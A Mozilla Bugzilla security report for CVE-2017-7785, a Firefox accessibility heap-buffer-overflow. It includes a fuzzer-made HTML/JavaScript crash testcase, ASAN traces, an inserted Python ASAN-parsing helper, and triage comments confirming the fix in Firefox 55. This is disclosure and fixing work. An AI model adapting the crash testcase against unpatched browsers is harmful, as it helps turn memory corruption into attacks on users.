Bug 1356985 (CVE-2017-7785)

heap-buffer-overflow in mozilla::a11y::DocAccessible::PutChildrenBack

VERIFIED FIXED in Firefox 55

Status


defect
VERIFIED FIXED
2 years ago
a year ago

People

(Reporter: nils, Assigned: surkov)

Tracking

(5 keywords)

Trunk
mozilla55
Points:
---
Bug Flags:
sec-bounty +

Firefox Tracking Flags

(firefox-esr52 unaffected, firefox54 wontfix, firefox55 verified)

Details

(Whiteboard: [post-critsmash-triage][adv-main55+] fixed by bug 1362063)

(Reporter)

Description

2 years ago
The following testcase crashes the latest ASAN build of Firefox.

crash.html:
<script>
function start() {
	try{fuzzPriv.enableAccessibility();}catch(e){ };
	o5=document;
	o105=document.documentElement;
	document.documentElement.innerHTML="<figcaption id='id16'><style' id='id29'>";
	o252=document.createElement('audio');
	o253=document.createElement('track');
	o252.appendChild(o253);
	o5.write('<html><body><div>');
	o256=o5.all[2];
	o252.controls^=1;
	o5.documentElement.appendChild(o252);
	o5.defaultView.onerror=fun1;
	setTimeout(fun0, 4);
}
function fun0() {
	document.documentElement.style.transform='scale(0.1)';
	o348=document.createElement('style');
	o349=document.createTextNode("@import url('data:text/css,.class0{display:inline;mask-repeat:round;}')");
	o348.appendChild(o349);
	o350=document.createElement('iframe');
	try{document.documentElement.animate([{background: '-moz-element(#id4)',},{}],100);}catch(e){}
	document.documentElement.appendChild(o105);
	document.documentElement.appendChild(o350);
	document.documentElement.appendChild(o348);
	o256.classList.toggle('class0');
}
var c=0;
function fun1() {
	if(c++!=1) return;
	o314=document.createElement("form");
	document.documentElement.appendChild(o314);
	o256.id='id14';
	o350.setAttribute('aria-owns','id29 id36 id4 id4');
	o314.setAttribute('aria-owns','id52 id14 id39 id47 id54 id16 id16 id29');
}
</script>
<body onload="start()"></body>


ASAN output:
=================================================================
==6299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ebe28 at pc 0x7f663ff03f2a bp 0x7ffe5e40bc50 sp 0x7ffe5e40bc48
READ of size 8 at 0x6020001ebe28 thread T0 (Web Content)
    #0 0x7f663ff03f29 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9
    #1 0x7f663ff03f29 in Destruct /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:560
    #2 0x7f663ff03f29 in DestructRange /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2007
    #3 0x7f663ff03f29 in RemoveElementsAt /home/worker/workspace/build/src/obj-firefox/dist/include/nsTArray.h:2055
    #4 0x7f663ff03f29 in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray<RefPtr<mozilla::a11y::Accessible> >*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2204
    #5 0x7f663ff0492d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2153:3
    #6 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #7 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #8 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #9 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #10 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #11 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #12 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #13 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #14 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #15 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #16 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #17 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #18 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #19 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #20 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #21 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #22 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #23 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #24 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #25 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #26 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #27 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #28 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #29 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #30 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #31 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34
    #32 0x4eb5c3 in content_process_main /home/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:64:30
    #33 0x4eb5c3 in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:286
    #34 0x7f665290382f in __libc_start_main /build/glibc-9tT8Do/glibc-2.23/csu/../csu/libc-start.c:291
    #35 0x41cf18 in _start (/home/nils/fuzzer3/firefox/firefox+0x41cf18)

0x6020001ebe28 is located 8 bytes to the left of 16-byte region [0x6020001ebe30,0x6020001ebe40)
allocated by thread T0 (Web Content) here:
    #0 0x4bb79c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x7f663703f450 in Alloc /home/worker/workspace/build/src/xpcom/string/nsSubstring.cpp:242:22
    #2 0x7f663703f450 in nsAString::MutatePrep(unsigned int, char16_t**, unsigned int*) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:155
    #3 0x7f6637046fb5 in nsAString::ReplacePrepInternal(unsigned int, unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:217:8
    #4 0x7f6637046e05 in nsAString::ReplacePrep(unsigned int, unsigned int, unsigned int) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:207:10
    #5 0x7f663704977e in nsAString::Replace(unsigned int, unsigned int, char16_t) /home/worker/workspace/build/src/xpcom/string/nsTSubstring.cpp:534:7
    #6 0x7f663fe6007d in mozilla::a11y::NotificationController::QueueMutationEvent(mozilla::a11y::AccTreeMutationEvent*) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:205:28
    #7 0x7f663fee54ef in mozilla::a11y::Accessible::MoveChild(unsigned int, mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/Accessible.cpp:2208:47
    #8 0x7f663ff05494 in mozilla::a11y::DocAccessible::MoveChild(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*, int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2232:16
    #9 0x7f663ff0479d in mozilla::a11y::DocAccessible::DoARIAOwnsRelocation(mozilla::a11y::Accessible*) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2144:9
    #10 0x7f663fe70b7c in mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) /home/worker/workspace/build/src/accessible/base/NotificationController.cpp:805:18
    #11 0x7f663d89051e in nsRefreshDriver::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:1738:12
    #12 0x7f663d89fa23 in mozilla::RefreshDriverTimer::TickRefreshDrivers(long, mozilla::TimeStamp, nsTArray<RefPtr<nsRefreshDriver> >&) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:299:7
    #13 0x7f663d89f6f4 in mozilla::RefreshDriverTimer::Tick(long, mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:321:5
    #14 0x7f663d8a1d5b in RunRefreshDrivers /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:711:5
    #15 0x7f663d8a1d5b in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::TickRefreshDriver(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:624
    #16 0x7f663d8a1a59 in mozilla::VsyncRefreshDriverTimer::RefreshDriverVsyncObserver::NotifyVsync(mozilla::TimeStamp) /home/worker/workspace/build/src/layout/base/nsRefreshDriver.cpp:525:9
    #17 0x7f663e0ebc64 in mozilla::layout::VsyncChild::RecvNotify(mozilla::TimeStamp const&) /home/worker/workspace/build/src/layout/ipc/VsyncChild.cpp:64:16
    #18 0x7f6638378647 in mozilla::layout::PVsyncChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PVsyncChild.cpp:155:20
    #19 0x7f6638036d46 in mozilla::ipc::PBackgroundChild::OnMessageReceived(IPC::Message const&) /home/worker/workspace/build/src/obj-firefox/ipc/ipdl/PBackgroundChild.cpp:1512:28
    #20 0x7f6637f96880 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1872:25
    #21 0x7f6637f930c7 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1807:17
    #22 0x7f6637f954f4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1680:5
    #23 0x7f6637f95af6 in mozilla::ipc::MessageChannel::MessageTask::Run() /home/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1713:15
    #24 0x7f66371e3b90 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1269:14
    #25 0x7f66371e05d8 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #26 0x7f6637f9de01 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #27 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #28 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #29 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #30 0x7f663d2125ff in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:27
    #31 0x7f6640816a17 in XRE_RunAppShell() /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:875:22
    #32 0x7f6637efffe0 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:10
    #33 0x7f6637efffe0 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #34 0x7f6637efffe0 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #35 0x7f664081640f in XRE_InitChildProcess(int, char**, XREChildData const*) /home/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:699:34

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9 in ~RefPtr
Shadow bytes around the buggy address:
  0x0c0480035770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0480035790: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c04800357b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c04800357c0: fa fa 00 00 fa[fa]00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
  0x0c04800357e0: fa fa 00 00 fa fa fd fd fa fa 00 00 fa fa 00 00
  0x0c04800357f0: fa fa 00 00 fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035800: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
  0x0c0480035810: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
==6299==ABORTING
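As an added triage aid (not part of the reporter's post), the snippet below parses the key lines of the ASAN report above and computes where the faulting read falls relative to the 16-byte heap region; it assumes the array elements are 8 bytes each (sizeof(RefPtr<Accessible>) on a 64-bit build), which is an assumption, not something the report states.

```python
import re

# Key lines copied from the ASAN report above (constructed excerpt, not the full log).
ASAN_EXCERPT = """\
==6299==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020001ebe28 at pc 0x7f663ff03f2a bp 0x7ffe5e40bc50 sp 0x7ffe5e40bc48
READ of size 8 at 0x6020001ebe28 thread T0 (Web Content)
    #0 0x7f663ff03f29 in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:77:9
    #4 0x7f663ff03f29 in mozilla::a11y::DocAccessible::PutChildrenBack(nsTArray<RefPtr<mozilla::a11y::Accessible> >*, unsigned int) /home/worker/workspace/build/src/accessible/generic/DocAccessible.cpp:2204
0x6020001ebe28 is located 8 bytes to the left of 16-byte region [0x6020001ebe30,0x6020001ebe40)
"""

def parse_asan_report(text, elem_size=8):
    """Describe a heap-buffer-overflow access relative to the region ASAN reports.

    elem_size is an assumption about the array's element width (8 bytes here:
    one pointer per RefPtr on a 64-bit build)."""
    err = re.search(r"ERROR: AddressSanitizer: (\S+) on address (0x[0-9a-f]+)", text)
    acc = re.search(r"^(READ|WRITE) of size (\d+) at (0x[0-9a-f]+)", text, re.M)
    loc = re.search(r"is located (\d+) bytes to the (left|right) of (\d+)-byte region "
                    r"\[(0x[0-9a-f]+),(0x[0-9a-f]+)\)", text)
    frame0 = re.search(r"^\s*#0 0x[0-9a-f]+ in (\S+)", text, re.M)
    if not (err and acc and loc and frame0):
        raise ValueError("report does not have the expected heap-buffer-overflow shape")
    region_start, region_end = int(loc.group(4), 16), int(loc.group(5), 16)
    addr = int(acc.group(3), 16)
    offset = addr - region_start          # negative: access landed before the region
    region_bytes = region_end - region_start
    # Cross-check ASAN's own "N bytes to the left/right" statement against the addresses.
    stated = int(loc.group(1))
    consistent = (offset == -stated) if loc.group(2) == "left" else (offset - region_bytes == stated)
    return {
        "kind": err.group(1),
        "access": acc.group(1),
        "size": int(acc.group(2)),
        "frame0": frame0.group(1),
        "region_bytes": region_bytes,
        "offset": offset,
        "side": loc.group(2),
        "consistent": consistent,
        "element_index": offset // elem_size,        # index the access corresponds to
        "elements_in_region": region_bytes // elem_size,
    }
```

For this report the access resolves to element index -1 of a two-element region, i.e. one element before the start of the array being destructed in RemoveElementsAt.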
Group: core-security → dom-core-security
Flags: sec-bounty?
Alex, can you look into this bug?
Flags: needinfo?(surkov.alexander)
(Assignee)

Comment 2

2 years ago
It is not against trunk, is it? It appears the patch from bug 1362063 (which tweaked this code a bit) is not on the stack here.
Flags: needinfo?(surkov.alexander)
Nils, it appears that this bug does not reproduce cleanly on the latest Firefox Nightly. Alexander suggested this was fixed independently in bug 1362063. Can you retest to confirm there is no other way to trigger this?
Flags: needinfo?(nils)
(Reporter)

Comment 4

2 years ago
It was against trunk when it was reported two months ago. I can confirm that it does not reproduce against the latest build.
Flags: needinfo?(nils)
Thank you for closing the loop, Nils.
I will close this bug as it was fixed unknowingly in bug 1362063.
We'll leave the bounty decision to the committee later.
Status: NEW → RESOLVED
Last Resolved: 2 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 1362063
Since the other bug is not a vulnerability, we get better tracking and testing if we make security bugs like this "Depend on" the generic bug (rewrite or whatever) and call this "FIXED" so we trigger our "does this need to land on branches" queries.
Depends on: 1362063
Flags: sec-bounty? → sec-bounty+
Resolution: DUPLICATE → FIXED
Whiteboard: fixed by bug 1362063
Indeed, is ESR52 affected?
Assignee: nobody → surkov.alexander
Flags: needinfo?(surkov.alexander)
Target Milestone: --- → mozilla55
(Assignee)

Comment 8

2 years ago
(In reply to Ryan VanderMeulen [:RyanVM] from comment #7)
> Indeed, is ESR52 affected?

It is a good question. Could someone confirm there's a problem on branches? If so, I will make a backport.
Flags: needinfo?(surkov.alexander)
Group: dom-core-security → core-security-release
Nils, do you know if this affects Firefox 52 (or ESR 52)?
Flags: needinfo?(nils)
Whiteboard: fixed by bug 1362063 → [adv-main55+] fixed by bug 1362063
Alias: CVE-2017-7785
(Reporter)

Comment 10

2 years ago
Al, I can't reproduce the crash on ESR 52 and I have not seen any similar crashes on ESR while fuzzing.
Flags: needinfo?(nils)
Flags: qe-verify+
Whiteboard: [adv-main55+] fixed by bug 1362063 → [post-critsmash-triage][adv-main55+] fixed by bug 1362063
I have managed to reproduce this issue by following the testcase provided in comment 0 using the Firefox 55.0a1 asan build (Build Id: 20170417195632) on Ubuntu 16.04 64-bit.

This issue is no longer reproducible on the Firefox 55.0 asan build (Build Id: 20170731163142).
Status: RESOLVED → VERIFIED
Flags: qe-verify+
Group: core-security-release